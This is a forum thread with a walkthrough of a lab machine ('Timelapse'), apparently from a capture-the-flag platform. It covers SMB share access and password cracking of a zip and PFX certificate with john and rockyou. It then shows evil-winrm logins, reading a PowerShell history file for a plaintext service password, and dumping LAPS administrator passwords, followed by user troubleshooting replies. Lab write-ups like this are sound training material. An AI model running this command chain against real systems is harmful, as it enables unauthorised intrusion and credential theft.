User:Port scan shows a handful of ports - 139, 445 and 5986 are of interest.[code]smbclient -L

[/code] for list of shares. Access "Shares" [code]smbclient \\\\

\\Shares [/code]Download the zip in the Dev directory[code]cd Devget winrm_backup.zip[/code]Locally get it hash friendly with zip2john and crack with rockyou.[code]zip2john winrm_backup.zip > winrm.hashjohn winrm.hash --wordlist=/usr/share/wordlists/rockyou.txt[/code]Inside is a certificate that also requires a password - again convert, this time with pfx2john. Rockyou has the password again.[code]pfx2john legacyy_dev_auth.pfx > pfx.hashjohn pfx.hash --wordlist=/usr/share/wordlists/rockyou.txt[/code]Use openssl to extract the cert and the private key [code]openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out priv.keyopenssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out pfx.crt [/code]Get a session with evil-winrm [code]evil-winrm -i

-c ./pfx.crt -k ./priv.key -p -u -S[/code]

in case anyone else gets the same issue, psexec.py didn't work for me but wmiexec.py did

I dont get the last part. I have dumped the ldap with bloodhound. But cant use secretdump.py with svc_deploy and i cant login with the creds for svc_deploy with either psexec or wmi

(March 28, 2022, 01:54 PM)br_7801 Wrote: I dont get the last part. I have dumped the ldap with bloodhound. But cant use secretdump.py with svc_deploy and i cant login with the creds for svc_deploy with either psexec or wmi

Use laps.py instead of secretsdump.py. Worked for me.

Root part:
evil-winrm -i 10.10.11.152 -c ./pfx.crt -k ./priv.key -p -u -S

# get password for svc_deploy
type C:\Users\legacyy\appdata
oaming\microsoft\windows\powershell\psreadline\consolehost_history.txt

# get evil-winrm with svc_deploy
evil-winrm -i 10.10.11.152 -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -S

# LAPS password dump powershell
$Computers = Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$Computers | Sort-Object ms-Mcs-AdmPwdExpirationTime | Format-Table -AutoSize Name, DnsHostName, ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime

# get evil-winrm with Administrator password from LAPS
evil-winrm -i 10.10.11.152 -u Administrator -p 'XXXXXXXXX' -S

# get root.txt
PS [C:\Users\TRX\Desktop> type root.txt

PS:
Rep if u like it =)

Hi everybody. Why do not work command

 evil-winrm -i 10.10.11.152 -c ./pfx.crt -k ./priv.key -p -u -S 

? Need username? Thanks.

(March 29, 2022, 03:10 PM)orangutang Wrote: Hi everybody. Why do not work command

 evil-winrm -i 10.10.11.152 -c ./pfx.crt -k ./priv.key -p -u -S 

? Need username? Thanks.

This is the client certificate

if you export the key in the priv.key file without the Passphrase (via openssl)  it works ;)

Hey,guys, I need some help
when i use openssl command to get .crt and .keye , it always ask me for PEM pass , what is that? And how did you guys get that?

┌──(root㉿kali)-[/home/…/Downloads/htb/timelapse/winrm_backup]
└─# openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out pfx.key
Enter Import Password:
Enter PEM pass phrase:
Verifying - Enter PEM pass phrase:

if you using an Arch GNU/Linux base distro like blackarch o Arch itself you many need to modify pfx2john because that version still requires python2.x then it outputs the hash so john can actually load it. if not you will get a "simple unable to load any hash" output or similar

(April 4, 2022, 01:24 AM)rebelon Wrote: if you using  an Arch GNU/Linux base distro like blackarch o Arch itself  you  many need to modify pfx2john because that version still requires python2.x then it outputs the hash so john can actually load it. if not you will get a "simple unable to load any hash" output or similar

Found out that pfx2john is a python2 script, works just fine if you run it that way instead of with python3. Spent a couple of hours on this issue.